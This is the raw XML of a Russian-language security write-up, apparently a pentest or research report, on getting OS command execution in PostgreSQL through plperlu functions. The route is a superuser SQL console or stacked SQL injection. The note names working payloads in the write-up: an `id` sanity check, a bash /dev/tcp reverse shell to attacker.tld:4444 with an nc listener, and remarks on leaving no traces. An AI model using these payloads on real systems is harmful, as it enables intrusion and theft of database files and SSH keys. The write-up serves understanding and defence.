        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-copy.html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«Predefined Roles»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 https://www.postgresql.org/docs/current/predefined-roles.html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HackTricks: «PostgreSQL injection» (раздел RCE / COPY) — https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection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PortSwigger SQLi cheat sheet, PostgreSQL section — https://portswigger.net/web-security/sql-injection/cheat-sheet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Greenwolf: «Authenticated arbitrary command execution on PostgreSQL» — https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5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Rapid7 Metasploit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/postgres/postgres_copy_from_program_cmd_exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.rapid7.com/db/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec/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CVE-2019-9193 (disputed; PostgreSQL Project считает фичей) — https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/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SecureLayer7: CVE-2025-1094 chain разбор — https://blog.securelayer7.net/cve-2025-1094-postgresql-vulnerability/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R3 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.2a plperlu untrusted (путь от superuser)</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(untrusted PL/Perl) — серверное процедурное расширение PostgreSQL, которое разрешает функциям выполнять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Perl-код, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">system()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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, backtick-shell-вызовы и работу с файлами. В отличие от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(trusted) — sandbox отсутствует, OS-операции не блокируются. CREATE FUNCTION в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требует superuser-привилегии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">именно потому</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что это путь к OS-execution.</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app/api/admin/sql_console.py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get_superuser_session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@router.post("/admin/sql/run")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def run_sql(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query: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Depends(get_superuser_session),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SQL Console для DBA — приложение коннектится под superuser</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session.execute(text(query))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Здесь sink — сам SQL-console (admin tool с прямой передачей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query</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Эквивалентный сценарий — SQLi через стакинг в любой endpoint, который использует superuser-сессию (типично — internal admin-tools, migration runners, monitoring agents). Конкатенация в endpoint типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/users/{id}</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f"SELECT … WHERE id={id}"</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id = "1; CREATE FUNCTION …"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даёт тот же результат при наличии stacked queries в драйвере (см. 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — sanity check через `id`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Создать функцию, вызвать, прочитать вывод из HTTP-ответа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (вводится в SQL Console или подставляется через стакинг):</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pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  my $out = `id 2&gt;&amp;1`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return $out;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100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.x();</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(то же самое — payload и есть SQL):</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pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  my $out = `id 2&gt;&amp;1`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return $out;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100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.x();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Функция создаётся в схеме </w:t>
      </w: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 temp-схема сессии, автоматически удаляется в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DISCONNECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Никаких следов в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после закрытия сессии. Возвращаемое значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=999(postgres) gid=999(postgres) groups=999(postgres)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) приходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">result.all()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложения, далее — в HTTP-ответ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — reverse-shell</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pg_temp.rev() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  exec("bash -c 'bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1'");</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100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.rev();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># интерактивный shell, права — postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (а не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — заменяет текущий процесс backend-процессом shell-а; PostgreSQL-сессия зависнет, но shell живёт.</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Произвольный Perl-код выполняется в адресном пространстве backend-процесса PostgreSQL под OS-пользователем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Возможности шире, чем у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: можно открывать файлы, делать сетевые соединения, читать env, мутировать переменные процесса, делать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fork()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Post-RCE — тот же набор, что в 3.7.1 (доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$PGDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, SSH-ключам,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(буква </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = untrusted) намеренно даёт полный доступ к Perl-runtime без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-sandbox. Это решение архитектора PostgreSQL: trusted-варианты языков (plperl, plpython3u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в старых версиях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) пытаются ограничить OS-API, untrusted-варианты — нет. Защита перенесена на уровень привилегий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует superuser. Если злоумышленник уже superuser, ограничений никаких.</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plperlu в стандартной поставке с PG 9.0+, поведение стабильное.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> может (а) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и (б) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. По умолчанию USAGE на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выдан только superuser-ам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
